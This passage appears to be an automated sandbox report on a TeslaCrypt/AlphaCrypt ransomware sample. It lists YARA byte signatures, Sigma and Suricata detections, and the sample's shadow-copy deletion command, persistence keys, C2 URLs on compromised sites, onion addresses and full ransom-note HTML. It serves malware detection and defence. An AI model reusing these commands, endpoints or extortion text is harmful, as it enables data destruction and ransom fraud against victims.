  • 0x12ef7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
13.2.svcmtr.exe.240000.0.raw.unpackWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x19436:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x12db0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12e56:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x12ef7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12f86:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x13045:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x19430:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1d2e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x19430:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1d2e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1d9b0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x12ef7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
2.2.svcmtr.exe.240000.0.unpackWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x18836:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x121b0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12256:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x122f7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12386:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x12445:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x18830:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1c6e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x18830:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1c6e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1cdb0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x122f7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
12.2.svcmtr.exe.2c0000.0.unpackWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x18836:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x121b0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12256:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x122f7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12386:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x12445:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x18830:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1c6e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x18830:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1c6e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1cdb0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x122f7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
Click to see the 10 entries

Sigma Signatures

System Summary

barindex
Sigma detected: DNS Query Tor .Onion Address - Sysmon
Source: DNS queryAuthor: frack113: Data: Image: C:\Users\user\AppData\Roaming\svcmtr.exe, QueryName: zpr5huq4bgmutfnf.onion.to
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet , CommandLine: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet , CommandLine|base64offset|contains: u^, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svcmtr.exe, ParentImage: C:\Users\user\AppData\Roaming\svcmtr.exe, ParentProcessId: 3504, ParentProcessName: svcmtr.exe, ProcessCommandLine: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet , ProcessId: 3636, ProcessName: vssadmin.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svcmtr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svcmtr.exe, ProcessId: 3504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\E722D94C1CAC34B
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\svcmtr.exe, QueryName: ipinfo.io
Sigma detected: Use NTFS Short Name in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL, CommandLine: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\0t8amSU3vd.exe", ParentImage: C:\Users\user\Desktop\0t8amSU3vd.exe, ParentProcessId: 3452, ParentProcessName: 0t8amSU3vd.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL, ProcessId: 3532, ProcessName: cmd.exe
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svcmtr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svcmtr.exe, ProcessId: 3504, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\E722D94C1CAC34B
Sigma detected: Modification of IE Registry Settings
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svcmtr.exe, ProcessId: 3504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-08T21:09:59.404903+010020217231Malware Command and Control Activity Detected192.168.2.2249164199.116.254.16980TCP
2025-01-08T21:10:02.476308+010020217231Malware Command and Control Activity Detected192.168.2.2249165185.230.63.17180TCP
2025-01-08T21:10:03.336051+010020217231Malware Command and Control Activity Detected192.168.2.2249166185.230.63.171443TCP
2025-01-08T21:10:04.741113+010020217231Malware Command and Control Activity Detected192.168.2.224916734.149.87.45443TCP
2025-01-08T21:10:05.429191+010020217231Malware Command and Control Activity Detected192.168.2.224916867.22.44.280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-08T21:10:08.210773+010028121341A Network Trojan was detected192.168.2.22639268.8.8.853UDP
2025-01-08T21:10:08.228147+010028121341A Network Trojan was detected192.168.2.22655108.8.8.853UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-08T21:09:59.404903+010028130181Malware Command and Control Activity Detected192.168.2.2249164199.116.254.16980TCP
2025-01-08T21:10:02.476308+010028130181Malware Command and Control Activity Detected192.168.2.2249165185.230.63.17180TCP
2025-01-08T21:10:05.429191+010028130181Malware Command and Control Activity Detected192.168.2.224916867.22.44.280TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-08T21:09:37.821207+010028032742Potentially Bad Traffic192.168.2.224916334.117.59.8180TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 0t8amSU3vd.exeAvira: detected
Antivirus detection for URL or domain
Source: https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496Avira URL Cloud: Label: malware
Source: http://ezglobalmarketing.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C9188Avira URL Cloud: Label: malware
Source: https://zpr5huq4bgmutfnf.tor2web.org/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CDAvira URL Cloud: Label: malware
Source: http://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975Avira URL Cloud: Label: malware
Source: https://www.serenitynowbooksandgifts.com/Avira URL Cloud: Label: malware
Source: https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975=Avira URL Cloud: Label: malware
Source: http://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496AAvira URL Cloud: Label: malware
Source: https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABDAvira URL Cloud: Label: malware
Source: https://serenitynowbooksandgifts.com/Avira URL Cloud: Label: malware
Source: https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975Avira URL Cloud: Label: malware
Source: https://zpr5huq4bgmutfnf.tor2web.orgAvira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: 0t8amSU3vd.exeReversingLabs: Detection: 91%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: 0t8amSU3vd.exeJoe Sandbox ML: detected
Source: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/restore_files_gpmus.htmlHTTP Parser: No favicon

Compliance

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\0t8amSU3vd.exeUnpacked PE file: 0.2.0t8amSU3vd.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 2.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 11.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 12.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 13.2.svcmtr.exe.400000.1.unpack
Source: 0t8amSU3vd.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_2696_1526441409
Source: unknownHTTPS traffic detected: 185.230.63.171:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: number of queries: 1023
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004139B0 _memset,_memset,FindFirstFileW,__wcsdup,wcsstr,wcsstr,wcsstr,wcsstr,_free,FindNextFileW,FindClose,0_2_004139B0
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004139B0 _memset,_memset,FindFirstFileW,__wcsdup,wcsstr,wcsstr,wcsstr,wcsstr,_free,FindNextFileW,FindClose,2_2_004139B0
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_00413780 GetLogicalDriveStringsW,_memset,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,0_2_00413780
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\AppCache\V607KDWC\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\restore_files_gpmus.txtJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2812134 - Severity 1 - ETPRO MALWARE AlphaCrypt .onion Proxy Domain : 192.168.2.22:63926 -> 8.8.8.8:53
Source: Network trafficSuricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49164 -> 199.116.254.169:80
Source: Network trafficSuricata IDS: 2813018 - Severity 1 - ETPRO MALWARE AlphaCrypt CnC Beacon 4 : 192.168.2.22:49164 -> 199.116.254.169:80
Source: Network trafficSuricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49165 -> 185.230.63.171:80
Source: Network trafficSuricata IDS: 2813018 - Severity 1 - ETPRO MALWARE AlphaCrypt CnC Beacon 4 : 192.168.2.22:49165 -> 185.230.63.171:80
Source: Network trafficSuricata IDS: 2812134 - Severity 1 - ETPRO MALWARE AlphaCrypt .onion Proxy Domain : 192.168.2.22:65510 -> 8.8.8.8:53
Source: Network trafficSuricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49168 -> 67.22.44.2:80
Source: Network trafficSuricata IDS: 2813018 - Severity 1 - ETPRO MALWARE AlphaCrypt CnC Beacon 4 : 192.168.2.22:49168 -> 67.22.44.2:80
Source: Network trafficSuricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49166 -> 185.230.63.171:443
Source: Network trafficSuricata IDS: 2021723 - Severity 1 - ET MALWARE AlphaCrypt CnC Beacon 3 : 192.168.2.22:49167 -> 34.149.87.45:443
Contains functionality to determine the online IP of the system
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0041A560 _memset,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,_strcpy_s,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, http://ipinfo.io/ip0_2_0041A560
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_0041A560 _memset,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,_strcpy_s,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, http://ipinfo.io/ip2_2_0041A560
Found Tor onion address
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/%S" target="_blank">http://aep554w4fm8j.fflroe598qu.com/%S</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/%S" target="_blank">http://aoei243548ld.keedo93i1lo.com/%S</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/%S" target="_blank">https://zpr5huq4bgmutfnf.onion.to/%S</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installation, run the browser and wait for initialization.<br>3. Type in the address b
Source: 0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 3. https://zpr5huq4bgmutfnf.onion.to/%S
Source: 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://zpr5huq4bgmutfnf.onion.to
